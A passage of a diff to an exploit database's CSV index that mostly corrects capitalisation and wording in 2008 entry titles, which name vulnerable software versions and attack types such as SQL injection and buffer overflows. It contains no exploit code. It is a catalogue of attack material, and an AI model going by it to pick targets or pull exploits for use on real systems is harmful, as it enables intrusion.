Control - (VAPGDecoder.dll 1.7.0.5) Buffer Overflow Exploit",2008-02-26,rgod,windows,remote,0 -5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 -5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 -5196,platforms/php/webapps/5196.pl,"EazyPortal 1.0 - (COOKIE) SQL Injection",2008-02-27,Iron,php,webapps,0 +5194,platforms/php/webapps/5194.txt,"WordPress Plugin Sniplets 1.1.2 - (Remote File Inclusion / Cross-Site Scripting / Remote Code Execution) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 +5195,platforms/php/webapps/5195.txt,"Mambo Component SimpleBoard 1.0.3 - 'catid' SQL Injection",2008-02-27,"it's my",php,webapps,0 +5196,platforms/php/webapps/5196.pl,"eazyPortal 1.0 - 'cookie' SQL Injection",2008-02-27,Iron,php,webapps,0 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 - (head_auth.php) Remote File Inclusion",2008-02-27,CraCkEr,php,webapps,0 5198,platforms/php/webapps/5198.txt,"Koobi Pro 5.7 - (categ) SQL Injection",2008-02-28,Cr@zy_King,php,webapps,0 5199,platforms/php/webapps/5199.txt,"SiteBuilderElite 1.2 - Multiple Remote File Inclusion",2008-02-28,MhZ91,php,webapps,0 @@ -4849,8 +4850,8 @@ id,file,description,date,author,platform,type,port 5208,platforms/php/webapps/5208.txt,"phpArcadeScript 3.0RC2 - (userid) SQL Injection",2008-03-01,"SoSo H H",php,webapps,0 5209,platforms/php/webapps/5209.txt,"phpComasy 0.8 - (mod_project_id) SQL Injection",2008-03-01,Cr@zy_King,php,webapps,0 5210,platforms/linux/dos/5210.c,"Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service",2008-03-01,0in,linux,dos,0 -5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - (albumID) SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 -5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Transversal",2008-03-03,gbr,windows,remote,0 +5211,platforms/php/webapps/5211.txt,"Dynamic photo Gallery 1.02 - 'albumID' SQL Injection",2008-03-01,"Aria-Security Team",php,webapps,0 +5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution Exploit",2008-03-04,"Luigi Auriemma",windows,remote,0 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart - SQL Injection",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 @@ -4869,14 +4870,14 @@ id,file,description,date,author,platform,type,port 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / null pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 5229,platforms/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0 5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 -5231,platforms/php/webapps/5231.php,"PHPMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0 +5231,platforms/php/webapps/5231.php,"phpMyNewsletter 0.8b5 - (archives.php msg_id) SQL Injection",2008-03-10,"Charles Fol",php,webapps,0 5232,platforms/php/webapps/5232.txt,"Mapbender 2.4.4 - (mapFiler.php) Remote Code Execution",2008-03-11,"RedTeam Pentesting",php,webapps,0 5233,platforms/php/webapps/5233.txt,"Mapbender 2.4.4 - (gaz) SQL Injection",2008-03-11,"RedTeam Pentesting",php,webapps,0 5234,platforms/php/webapps/5234.txt,"Bloo 1.00 - Multiple SQL Injections",2008-03-11,MhZ91,php,webapps,0 5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow Denial of Service",2008-03-11,ryujin,windows,dos,0 5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase - 'id' SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0 -5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Path Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0 +5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote,0 5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Blind SQL Injection",2008-03-11,InATeam,php,webapps,0 5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Blind SQL Injection",2008-03-12,t0pP8uZz,php,webapps,0 5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 @@ -4884,10 +4885,10 @@ id,file,description,date,author,platform,type,port 5243,platforms/php/webapps/5243.txt,"Fully Modded phpBB - 'kb.php' SQL Injection",2008-03-12,TurkishWarriorr,php,webapps,0 5244,platforms/php/webapps/5244.txt,"eXV2 Module bamaGalerie 3.03 - SQL Injection",2008-03-12,S@BUN,php,webapps,0 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 -5246,platforms/php/webapps/5246.txt,"easycalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 +5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"easygallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5248,platforms/windows/remote/5248.py,"MDaemon IMAP server 9.6.4 - (FETCH) Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 -5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authenticated Remote Buffer Overflow Exploit",2008-03-14,haluznik,windows,remote,0 +5249,platforms/windows/remote/5249.pl,"MailEnable Pro/Ent 3.13 - (Fetch) Post-Authentication Remote Buffer Overflow Exploit",2008-03-14,haluznik,windows,remote,0 5250,platforms/windows/local/5250.cpp,"VLC 0.8.6e - Subtitle Parsing Local Buffer Overflow",2008-03-14,"Mai Xuan Cuong",windows,local,0 5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 @@ -4896,8 +4897,8 @@ id,file,description,date,author,platform,type,port 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - (online.php) Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit",2008-03-14,kingcope,multiple,remote,0 5258,platforms/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - rpc.metad Denial of Service (PoC)",2008-03-14,kingcope,solaris,dos,0 -5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 -5260,platforms/php/webapps/5260.txt,"fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 +5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Post-Authentication Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 +5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 @@ -4905,8 +4906,8 @@ id,file,description,date,author,platform,type,port 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusion",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 -5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 -5269,platforms/windows/remote/5269.txt,"mg-soft net inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 +5268,platforms/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OS X/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",multiple,dos,0 +5269,platforms/windows/remote/5269.txt,"mg-soft net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5270,platforms/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,windows,dos,0 5273,platforms/php/webapps/5273.txt,"Joomla Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 @@ -4921,14 +4922,14 @@ id,file,description,date,author,platform,type,port 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 5285,platforms/php/webapps/5285.txt,"RunCMS Module section - (artid) SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,php,webapps,0 -5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution Exploit (MS08-014)",2008-03-21,zha0,windows,local,0 +5287,platforms/windows/local/5287.txt,"Microsoft Excel - Code Execution (MS08-014)",2008-03-21,zha0,windows,local,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (default pass) Remote Root",2008-03-21,"Pranav Joshi",hardware,remote,0 5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5291,platforms/php/webapps/5291.txt,"D.E. Classifieds - 'cat_id' SQL Injection",2008-03-21,S@BUN,php,webapps,0 5292,platforms/php/webapps/5292.py,"PostNuke 0.764 - Blind SQL Injection",2008-03-21,The:Paradox,php,webapps,0 5293,platforms/php/webapps/5293.pl,"XLPortal 2.2.4 - (search) SQL Injection",2008-03-21,cOndemned,php,webapps,0 -5294,platforms/php/webapps/5294.txt,"joomla components custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 +5294,platforms/php/webapps/5294.txt,"joomla Components custompages 1.1 - Remote File Inclusion",2008-03-22,Sniper456,php,webapps,0 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 - (dynamic_titles.php) SQL Injection",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 - 'login.php' Local File Inclusion",2008-03-22,KnocKout,php,webapps,0 5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 - (op_id) SQL Injection",2008-03-23,Sniper456,php,webapps,0 @@ -4944,7 +4945,7 @@ id,file,description,date,author,platform,type,port 5307,platforms/linux/dos/5307.pl,"MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download",2008-03-25,"Jerome Athias",php,webapps,0 5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Security Vulnerabilities",2008-03-25,DSecRG,php,webapps,0 -5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,php,webapps,0 +5310,platforms/php/webapps/5310.txt,"Joomla Component Alphacontent 2.5.8 - 'id' SQL Injection",2008-03-25,cO2,php,webapps,0 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - SQL Injection",2008-03-25,girex,php,webapps,0 5312,platforms/php/webapps/5312.txt,"TopperMod 1.0 - (mod.php) Local File Inclusion",2008-03-25,girex,php,webapps,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 @@ -4957,26 +4958,26 @@ id,file,description,date,author,platform,type,port 5320,platforms/windows/local/5320.txt,"Microsoft Office XP SP3 - PPT File Buffer Overflow (MS08-016)",2008-03-30,Marsu,windows,local,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow PoC / Denial of Service",2008-03-30,Marsu,windows,dos,0 5322,platforms/php/webapps/5322.txt,"Smoothflash - 'admin_view_image.php cid' SQL Injection",2008-03-30,S@BUN,php,webapps,0 -5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0 +5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB (tmp_theme) 5.1.1 - Local File Inclusion",2008-03-30,Cr@zy_King,php,webapps,0 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion",2008-03-30,v0l4arrra,php,webapps,0 -5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 +5326,platforms/php/webapps/5326.txt,"WordPress Plugin Download - (dl_id) SQL Injection",2008-03-31,BL4CK,php,webapps,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"PHPSpamManager 0.53b - (body.php) Remote File Disclosure",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen - SQL Injection",2008-03-31,anonymous,php,webapps,0 5330,platforms/windows/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows/x86) - Remote Buffer Overflow",2008-03-31,Heretic2,windows,remote,80 -5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - (articleId) SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 -5332,platforms/windows/remote/5332.html,"Real Player - rmoc3260.dll ActiveX Control Remote Code Execution Exploit",2008-04-01,Elazar,windows,remote,0 +5331,platforms/php/webapps/5331.pl,"Neat weblog 0.2 - 'articleId' SQL Injection",2008-03-31,"Khashayar Fereidani",php,webapps,0 +5332,platforms/windows/remote/5332.html,"Real Player - rmoc3260.dll ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote,0 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - (SQL Injection / Cross-Site Scripting / Local File Inclusion) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - (show.php id) SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0 5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop 1.51 - (vara) SQL Injection",2008-04-01,S@BUN,php,webapps,0 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - Password Retrieve SQL Injection",2008-04-01,girex,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 - 'id' SQL Injection",2008-04-01,Stack,php,webapps,0 5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote,0 -5339,platforms/php/webapps/5339.php,"Nuked-Klan 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 +5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 -5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authenticated Overflow",2008-04-02,muts,windows,remote,7510 +5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH Pre-Authentication Overflow",2008-04-02,muts,windows,remote,7510 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0 @@ -4995,7 +4996,7 @@ id,file,description,date,author,platform,type,port 5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0 -5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - .DSR File Local Buffer Overflow Exploit",2008-04-04,shinnai,windows,local,0 +5361,platforms/windows/local/5361.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.DSR' File Local Buffer Overflow Exploit",2008-04-04,shinnai,windows,local,0 5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0 @@ -5036,8 +5037,8 @@ id,file,description,date,author,platform,type,port 5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder 7.5 - (ladderid) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 -5402,platforms/php/webapps/5402.txt,"iScripts SocialWare - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 -5404,platforms/php/webapps/5404.php,"phpTournois G4 - Remote File Upload / Code Execution Exploit",2008-04-08,"Charles Fol",php,webapps,0 +5402,platforms/php/webapps/5402.txt,"iScripts Socialware - 'id' SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0 +5404,platforms/php/webapps/5404.php,"phpTournois G4 - Remote File Upload / Code Execution",2008-04-08,"Charles Fol",php,webapps,0 5405,platforms/php/webapps/5405.txt,"exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities",2008-04-08,The:Paradox,php,webapps,0 5406,platforms/php/webapps/5406.txt,"Pligg CMS 9.9.0 - (editlink.php id) SQL Injection",2008-04-08,"Guido Landi",php,webapps,0 5407,platforms/php/webapps/5407.php,"FLABER 1.1 RC1 - Remote Command Execution Exploit",2008-04-08,EgiX,php,webapps,0 @@ -5050,19 +5051,19 @@ id,file,description,date,author,platform,type,port 5414,platforms/php/webapps/5414.txt,"Koobi Pro 6.25 - showimages SQL Injection",2008-04-08,S@BUN,php,webapps,0 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 - gallery SQL Injection",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 -5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 +5417,platforms/php/webapps/5417.htm,"phpBB Addon Fishing Cat Portal - Remote File Inclusion",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart 1.1.1 - (category id) Blind SQL Injection",2008-04-10,irvian,php,webapps,0 5423,platforms/php/webapps/5423.txt,"Ksemail - 'index.php language' Local File Inclusion",2008-04-10,dun,php,webapps,0 -5424,platforms/linux/local/5424.txt,"Alsaplayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0 +5424,platforms/linux/local/5424.txt,"AlsaPlayer < 0.99.80-rc3 - Vorbis Input Local Buffer Overflow",2008-04-10,"Albert Sellares",linux,local,0 5425,platforms/php/webapps/5425.pl,"LightNEasy 1.2 - (no database) Remote Hash Retrieve Exploit",2008-04-10,girex,php,webapps,0 5426,platforms/php/webapps/5426.txt,"RX Maxsoft - 'popup_img.php fotoID' SQL Injection",2008-04-10,S@BUN,php,webapps,0 -5427,platforms/windows/dos/5427.pl,"Borland InterBase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 +5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 5428,platforms/php/webapps/5428.txt,"PHPKB 1.5 Knowledge Base - 'ID' SQL Injection",2008-04-11,parad0x,php,webapps,0 -5429,platforms/php/webapps/5429.txt,"newsoffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 +5429,platforms/php/webapps/5429.txt,"NewsOffice 1.1 - Remote File Inclusion",2008-04-11,RoMaNcYxHaCkEr,php,webapps,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5431,platforms/php/webapps/5431.txt,"Joomla Component joomlaXplorer 1.6.2 - Remote Vulnerabilities",2008-04-11,Houssamix,php,webapps,0 5432,platforms/php/webapps/5432.txt,"PHPAddressBook 2.11 - (view.php id) SQL Injection",2008-04-11,Cr@zy_King,php,webapps,0 @@ -5082,22 +5083,22 @@ id,file,description,date,author,platform,type,port 5446,platforms/php/webapps/5446.txt,"BosNews 4.0 - (article) SQL Injection",2008-04-14,Crackers_Child,php,webapps,0 5447,platforms/php/webapps/5447.txt,"Koobi CMS 4.2.4/4.2.5/4.3.0 - Multiple SQL Injections",2008-04-14,JosS,php,webapps,0 5448,platforms/php/webapps/5448.txt,"Koobi Pro 6.25 - poll SQL Injection",2008-04-14,S@BUN,php,webapps,0 -5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution Exploit",2008-04-14,Ajax,php,webapps,0 +5449,platforms/php/webapps/5449.php,"KwsPHP - (Upload) Remote Code Execution",2008-04-14,Ajax,php,webapps,0 5450,platforms/php/webapps/5450.txt,"Classifieds Caffe - 'index.php cat_id' SQL Injection",2008-04-15,JosS,php,webapps,0 -5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Authenticated Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080 +5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - Pre-Authentication Remote SEH Overflow",2008-04-15,ryujin,windows,remote,6080 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 -5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - .srt File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0 +5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0 5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - SQL Injection (2)",2008-04-15,cO2,php,webapps,0 -5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - .srt File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0 +5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0 5456,platforms/asp/webapps/5456.txt,"carbon communities 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials 2.1 - 'id' SQL Injection",2008-04-16,cO2,php,webapps,0 5458,platforms/linux/dos/5458.txt,"xine-lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",linux,dos,0 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion",2008-04-17,by_casper41,php,webapps,0 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 - WkImgSrv.dll ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",windows,dos,0 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow Exploit (Metasploit)",2008-04-17,oveRet,windows,remote,0 -5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .srt File SEH Buffer Overflow",2008-04-18,muts,windows,local,0 +5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - '.srt' File SEH Buffer Overflow",2008-04-18,muts,windows,local,0 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a - (location) Remote File Inclusion",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 -5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - (category_ID) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 +5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart - (category_id) SQL Injection",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs 1.2.2 - Arbitrary Database Backup/Download",2008-04-18,t0pP8uZz,php,webapps,0 5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 5467,platforms/php/webapps/5467.txt,"PhShoutBox 1.5 - (final) Insecure Cookie Handling",2008-04-18,t0pP8uZz,php,webapps,0 @@ -5108,9 +5109,9 @@ id,file,description,date,author,platform,type,port 5472,platforms/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,windows,dos,0 5473,platforms/php/webapps/5473.pl,"XOOPS Module Recipe - 'detail.php id' SQL Injection",2008-04-19,S@BUN,php,webapps,0 5474,platforms/php/webapps/5474.txt,"Aterr 0.9.1 - (class) Local File Inclusion (PHP5)",2008-04-19,KnocKout,php,webapps,0 -5475,platforms/asp/webapps/5475.txt,"W1L3D4 Philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0 +5475,platforms/asp/webapps/5475.txt,"W1L3D4 philboard 1.0 - (philboard_reply.asp) SQL Injection",2008-04-20,U238,asp,webapps,0 5476,platforms/php/webapps/5476.txt,"HostDirectory Pro - Insecure Cookie Handling",2008-04-20,Crackers_Child,php,webapps,0 -5477,platforms/php/webapps/5477.txt,"Kubelance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 +5477,platforms/php/webapps/5477.txt,"KubeLance 1.6.4 - (ipn.php i) Local File Inclusion",2008-04-20,Crackers_Child,php,webapps,0 5478,platforms/php/webapps/5478.txt,"acidcat CMS 3.4.1 - Multiple 